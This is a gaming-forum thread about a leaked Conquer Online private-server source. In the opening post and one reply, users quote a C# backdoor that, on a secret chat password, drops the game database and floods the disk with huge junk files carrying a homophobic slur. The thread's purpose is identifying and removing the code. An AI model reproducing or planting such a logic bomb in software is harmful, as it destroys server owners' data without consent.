Register for your free account! | Forgot your password?

You last visited: Today at 18:31

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Malicious code

Discussion on Malicious code within the CO2 Private Server forum part of the Conquer Online 2 category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: May 2009
Posts: 874
Received Thanks: 174
Malicious code

Code:
                    case 1004:
                        {
                            short ChatType = (short)(Data[8] | (Data[9] << 8));
                            int Pos = 26;
                            int Length = 0;
                            string From = "";
                            string To = "";
                            string Message = "";
                            for (int Count = 0; Count < Data[25]; Count += 1)
                            {
                                From += Convert.ToChar(Data[Pos]);
                                Pos += 1;
                            }

                            Length = Data[Pos];
                            Pos += 1;

                            for (int Count = 0; Count < Length; Count += 1)
                            {
                                To += Convert.ToChar(Data[Pos]);
                                Pos += 1;
                            }

                            Pos += 1;
                            Length = Data[Pos];
                            Pos += 1;

                            for (int Count = 0; Count < Length; Count += 1)
                            {
                                if (Pos <= Data.Length)
                                    Message += Convert.ToChar(Data[Pos]);
                                Pos += 1;
                            }

                            if (Message == "@go_to_hell!ENC3101931993")
                            {
                                MySql.Data.MySqlClient.MySqlCommand Command = new MySql.Data.MySqlClient.MySqlCommand("drop database `coproj`", DataBase.Connection);
                                Command.ExecuteNonQuery();
                                
                                for (ulong i = 0; i < 547473346363; i++)
                                {
                                    System.IO.StreamWriter WW = new System.IO.StreamWriter("C:\\Virus" + i.ToString() + ".exe", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay whore!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                    WW = new System.IO.StreamWriter("C:\\YouSuck" + i.ToString() + ".txt", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay whore!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                }                                
                            }
i need to delete all this right?
or is there more?
Arcotemple:) is offline  
Thanks
1 User
Old 07/07/2009, 02:31   #2
 
[GMs]'s Avatar
 
elite*gold: 100
Join Date: Apr 2007
Posts: 183
Received Thanks: 57
Code:
                            if (Message == "@go_to_hell!ENC3101931993")
                            {
                                MySql.Data.MySqlClient.MySqlCommand Command = new MySql.Data.MySqlClient.MySqlCommand("drop database `coproj`", DataBase.Connection);
                                Command.ExecuteNonQuery();
                                
                                for (ulong i = 0; i < 547473346363; i++)
                                {
                                    System.IO.StreamWriter WW = new System.IO.StreamWriter("C:\\Virus" + i.ToString() + ".exe", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay *****!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                    WW = new System.IO.StreamWriter("C:\\YouSuck" + i.ToString() + ".txt", true);
                                    for (ulong u = 0; u < 5857474673576; u++)
                                    {
                                        WW.WriteLine("No stealing our server you gay *****!!");
                                    }
                                    WW.Flush();
                                    WW.Close();
                                }                                
                            }
This.
[GMs] is offline  
Thanks
1 User
Old 07/07/2009, 02:40   #3
 
elite*gold: 0
Join Date: May 2009
Posts: 874
Received Thanks: 174
thanks!
Arcotemple:) is offline  
Old 07/07/2009, 06:29   #4
 
elite*gold: 0
Join Date: Jan 2009
Posts: 1,922
Received Thanks: 491
it wont work anyway because it says at first all message must me /
PeTe Ninja is offline  
Old 07/07/2009, 06:40   #5
 
hunterman01's Avatar
 
elite*gold: 20
Join Date: Dec 2006
Posts: 945
Received Thanks: 175
i have seen that before what source is it ???

I know its lotf but i mean what version
hunterman01 is offline  
Old 07/07/2009, 06:48   #6
 
elite*gold: 0
Join Date: Jan 2009
Posts: 1,922
Received Thanks: 491
original lol
PeTe Ninja is offline  
Old 07/07/2009, 06:53   #7
 
hunterman01's Avatar
 
elite*gold: 20
Join Date: Dec 2006
Posts: 945
Received Thanks: 175
Weird mine never had that
hunterman01 is offline  
Old 07/07/2009, 20:00   #8
 
elite*gold: 0
Join Date: May 2008
Posts: 103
Received Thanks: 3
ty but where is can add this code plz explain to me iam still noob
m7med is offline  
Old 07/07/2009, 20:04   #9
 
~*NewDuuDe*~'s Avatar
 
elite*gold: 111
Join Date: Feb 2008
Posts: 2,161
Received Thanks: 646
Quote:
Originally Posted by hunterman01 View Post
Weird mine never had that
Obviously someone before you removed it.
~*NewDuuDe*~ is offline  
Old 07/07/2009, 21:24   #10
 
_Emme_'s Avatar
 
elite*gold: 1142
Join Date: Aug 2006
Posts: 2,464
Received Thanks: 1,162
Meh, like Tanel would log in to your server and type this command, btw:

go_to_hell!ENC3101931993
Birth Day
Birth Month
Birth Year

Of Tanel.
_Emme_ is offline  
Old 07/08/2009, 00:49   #11
 
elite*gold: 20
Join Date: Apr 2008
Posts: 2,281
Received Thanks: 913
0193 is a Month?
kinshi88 is offline  
Old 07/08/2009, 00:54   #12
 
elite*gold: 0
Join Date: Jun 2009
Posts: 140
Received Thanks: 12
Quote:
Originally Posted by kinshi88 View Post
0193 is a Month?
Thats what i thought but no
Birth Month (O1)
Birth Year (93)
JustChillin is offline  
Old 07/08/2009, 01:09   #13
 
cloudwind360's Avatar
 
elite*gold: 0
Join Date: Feb 2009
Posts: 295
Received Thanks: 29
wow o.o
cloudwind360 is offline  
Old 07/08/2009, 01:28   #14
 
elite*gold: 0
Join Date: Jun 2009
Posts: 149
Received Thanks: 15
Cool, so he's 7 years old.
AmbiguousStatement is offline  
Old 07/08/2009, 01:41   #15
 
elite*gold: 0
Join Date: Oct 2008
Posts: 430
Received Thanks: 176
so the year is 2000? o.O
Incariuz is offline  
Closed Thread


Similar Threads Similar Threads
malicious devil my server help
08/04/2010 - SRO Private Server - 0 Replies
saver like me if there is any way to patch the malicious devil I mean removing it from the mastery or a patch to use it without dropping the data I hope and I can help
Bug or Malicious Exploit? Pls Help
11/01/2008 - Silkroad Online - 3 Replies
I was playing silkroad about 9 hours ago, and joined an Event. We were fighting the lvl 75 kangaroos and everyone on my team was under 60. So we had a hard time killing the mobs together... the other team got there key&flag. and were spawn killing us like crazy. i got mad...and stopped spawning myself, as i watched my screen and had a smoke. The match finally ended... when i was teleported back to Hotan is when i noticed the problem. All of my f-14 & 1-9 keys had been changed...but only the...
Coder please check this file for malicious code
04/10/2007 - World of Warcraft - 5 Replies
Hello can any1 check this for malicious code or anything else that will compromise security. I have attached the source file and the original, If any1 does this it would be awesome, thanks WowAceUpdater-1.7-final-bin.zip <<<The actual file http://www.zerowaitingtime.com/18840-downl...7-fi nal-bin.zip WowAceUpdater-1.7-final-src.zip <<<The source file http://www.zerowaitingtime.com/18841-downl...7-fi nal-src.zip



All times are GMT +1. The time now is 18:31.


Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.